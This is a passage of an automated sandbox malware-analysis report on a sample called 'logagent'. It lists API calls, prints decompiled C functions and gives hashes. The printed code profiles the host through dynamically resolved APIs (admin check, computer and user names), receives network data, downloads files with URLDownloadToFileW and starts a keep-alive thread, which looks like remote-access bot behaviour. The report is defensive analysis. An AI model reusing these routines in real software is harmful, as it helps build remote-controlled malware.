??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 621->640 641 40d486-40d492 call 40221a 621->641 629->381 648 40e08d-40e091 629->648 636 40e06b-40e06d 630->636 633->429 634->633 636->381 640->381 655 40d4cf-40d4d2 640->655 653 40d4a1-40d4ab call 402580 641->653 654 40d494-40d49c call 402637 641->654 648->636 653->381 654->381 655->432
                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
                                  • SetEvent.KERNEL32(?), ref: 0040D2C5
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040D2CE
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6DF55DF0), ref: 0040D2E8
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 0040D2F9
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D308
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • GetTickCount.KERNEL32 ref: 0040D33C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000000,0041B310,00000000,?,?,00000000), ref: 0040D39C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,0041B310,00000000,?,?,00000000), ref: 0040D3AC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3BC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,00000000,?,?,00000000), ref: 0040D3CC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,00000000,?,?), ref: 0040D3DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040D3E6
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000004C), ref: 0040D402
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D40E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D41A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D432
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D43E
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040D44A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D456
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040D462
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000001), ref: 0040D474
                                  • atoi.MSVCRT ref: 0040D47B
                                  • Sleep.KERNEL32(00000064), ref: 0040DD60
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 0040DD83
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,00000000), ref: 0040DD95
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDB0
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000), ref: 0040DDBB
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000002,00000000), ref: 0040DDDD
                                  • URLDownloadToFileW.URLMON(00000000,00000000), ref: 0040DDE5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040DDF9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040DE0D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@V01@@$?length@?$basic_string@V12@$?substr@?$basic_string@$??4?$basic_string@?find@?$basic_string@CountD@1@@DownloadEventFileSleepTickV01@atoi
                                  • String ID: $$PowrProf.dll$SetSuspendState
                                  • API String ID: 2465730144-1158640710
                                  • Opcode ID: 700d22180a46834cfb2d7b2e024b23e4551d9b1613aa921921a51e3d56ddad31
                                  • Instruction ID: 8b97f5ae68acd249977ecc05ae4d1582f654e66521c0ff460722a1e21975d306
                                  • Opcode Fuzzy Hash: 700d22180a46834cfb2d7b2e024b23e4551d9b1613aa921921a51e3d56ddad31
                                  • Instruction Fuzzy Hash: D8529372900208EBDB04BBB1EC59AEE7768EF54305F10487EF512A70E2DF785A54CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00409908 Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 100%
                                  			E00409908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}






                                  0x0040991b
                                  0x00409924
                                  0x0040992c
                                  0x00409933
                                  0x00409944
                                  0x00409944
                                  0x0040995f
                                  0x00409964
                                  0x00409975
                                  0x00409975
                                  0x00409993
                                  0x004099a7
                                  0x004099bb
                                  0x004099cf
                                  0x004099e3
                                  0x004099f7
                                  0x00409a0b
                                  0x00409a1c
                                  0x00409a24
                                  0x00409a28
                                  0x00409a2e

                                  APIs
                                  • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                  • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                  • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                  • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                  • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                  • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                  • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                  • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                  • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                  • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                  • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                  • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule$LibraryLoad
                                  • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                  • API String ID: 551388010-2914448473
                                  • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                  • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                  • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402580 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66timethreadCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 37%
                                  			E00402580(void* __ecx, intOrPtr _a4, intOrPtr _a8, char _a11) {
				struct _SYSTEMTIME _v20;
				char _v36;
				void* _v52;
				char* _t25;
				char* _t26;
				intOrPtr _t35;
				void* _t37;

				_t37 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0) {
					__eflags = 0;
					return 0;
				}
				_t35 = _a4;
				if(_a8 != 0) {
					__eflags =  *0x41bcac; // 0x0
					if(__eflags != 0) {
						GetLocalTime( &_v20);
						_t25 =  &_a11;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t25, "KeepAlive Enabled! Timeout: %i seconds\n", _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff, _v20.wMilliseconds & 0x0000ffff, _t35);
						_t26 =  &_v36;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t26, _t25);
						printf(_t26);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					}
				} else {
					 *((char*)(__ecx + 0x44)) = 1;
				}
				 *((char*)(_t37 + 0x38)) = 1;
				 *((intOrPtr*)(_t37 + 0x3c)) = _t35;
				CreateThread(0, 0, E004027A2, _t37, 0, 0); // executed
				return 1;
			}










                                  0x00402588
                                  0x0040258f
                                  0x0040262f
                                  0x00000000
                                  0x0040262f
                                  0x00402599
                                  0x0040259c
                                  0x004025a4
                                  0x004025aa
                                  0x004025b0
                                  0x004025ce
                                  0x004025dc
                                  0x004025e3
                                  0x004025e7
                                  0x004025f1
                                  0x004025f8
                                  0x00402604
                                  0x0040260d
                                  0x0040260d
                                  0x0040259e
                                  0x0040259e
                                  0x0040259e
                                  0x0040261d
                                  0x00402621
                                  0x00402624
                                  0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,00000001,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025B0
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,0000000A,?,00000000,?,0000000A), ref: 004025DC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025E7
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,0040CAF3,0000000A,00000000), ref: 004025F1
                                  • printf.MSVCRT ref: 004025F8
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402604
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040260D
                                  • CreateThread.KERNELBASE(00000000,00000000,004027A2,0041BE70,00000000,00000000), ref: 00402624
                                  Strings
                                  • %02i:%02i:%02i:%03i [INFO] , xrefs: 004025D7
                                  • KeepAlive Enabled! Timeout: %i seconds, xrefs: 004025D1
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@CreateD@1@@D@2@@0@Hstd@@LocalThreadTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds
                                  • API String ID: 3715082883-586133315
                                  • Opcode ID: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction ID: a312a60622e34753c5bc094497f25c33392341c8bb354fb046c7070d615c6ac2
                                  • Opcode Fuzzy Hash: 51604d627dacd7a8ae8a3435ef703a50610ed316e6cde58bd2f1e49f68c81dc1
                                  • Instruction Fuzzy Hash: A611EB71800258FFCB119BE1DC48DFFBBBCAB95705B004426F842A3190D6B99944CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402149 Relevance: 16.6, APIs: 11, Instructions: 75networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 0040215B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6), ref: 00402168
                                  • malloc.MSVCRT ref: 00402175
                                  • recv.WS2_32(0041BE70,00000000,000003E8,00000000), ref: 00402186
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8), ref: 0040219A
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021A4
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021AD
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021BA
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,0041BE70,00000000), ref: 00402230
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 00402248
                                    • Part of subcall function 0040221E: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00402257
                                    • Part of subcall function 0040221E: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402261
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040227A
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402283
                                    • Part of subcall function 0040221E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0040D2A6,0041BEA4), ref: 004022A2
                                    • Part of subcall function 0040221E: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004022C2
                                    • Part of subcall function 0040221E: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(0041B300,00415664), ref: 004022DA
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(0040D2A6), ref: 004022EC
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,0000000F,6DF55DF0), ref: 00402302
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040230C
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402315
                                    • Part of subcall function 0040221E: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,0040D2A6), ref: 00402326
                                    • Part of subcall function 0040221E: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00402330
                                    • Part of subcall function 0040221E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402339
                                    • Part of subcall function 0040221E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040234D
                                  • free.MSVCRT(00000000,0041BE70,0041B310,?,?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 004021DB
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 00402204
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,0040D1C8,0040D2A6,00000001), ref: 0040220D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$V01@@$??1?$basic_string@V01@$??0?$basic_string@??4?$basic_string@$D@1@@$??9std@@?substr@?$basic_string@D@2@@0@V12@V?$basic_string@$?c_str@?$basic_string@?data@?$basic_string@?length@?$basic_string@?size@?$basic_string@Y?$basic_string@freemallocrecv
                                  • String ID:
                                  • API String ID: 2200674315-0
                                  • Opcode ID: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction ID: 77ffb52b31aa9a22c106954051cf48487ac881783d2d7cd2d5b7dec6e0024f6e
                                  • Opcode Fuzzy Hash: 533559aab0e3dcf38d7224a0014533e596ea9eed5f72da431cbdb498b9f83fa6
                                  • Instruction Fuzzy Hash: 0221443250050DEBCB15EBA0DE49EDEB7B9FF94745B104029E902B21D1DBB56A05CB14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412163 Relevance: 9.0, APIs: 6, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 28%
                                  			E00412163(intOrPtr _a4) {
				char _v5;
				char _v12;
				long _v16;
				char _v32;
				void* _v48;
				char _v80;
				short _v592;
				char* _t23;
				char* _t25;

				_v12 = 0x10;
				 *0x41c1e8(1,  &_v80,  &_v12); // executed
				_v16 = 0x100;
				GetUserNameW( &_v592,  &_v16); // executed
				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z("/", _t23,  &_v592);
				_t25 =  &_v32;
				L0041416A();
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_a4, _t25, _t25,  &_v80, _t23);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _a4;
			}












                                  0x0041216f
                                  0x0041217d
                                  0x00412186
                                  0x00412195
                                  0x004121a5
                                  0x004121ae
                                  0x004121b9
                                  0x004121bd
                                  0x004121c9
                                  0x004121d4
                                  0x004121dd
                                  0x004121e7

                                  APIs
                                  • GetUserNameW.ADVAPI32(?,?), ref: 00412195
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00416C08,?,?), ref: 004121AE
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 004121BD
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(00000010,00000000), ref: 004121C9
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121D4
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004121DD
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmpDownload File
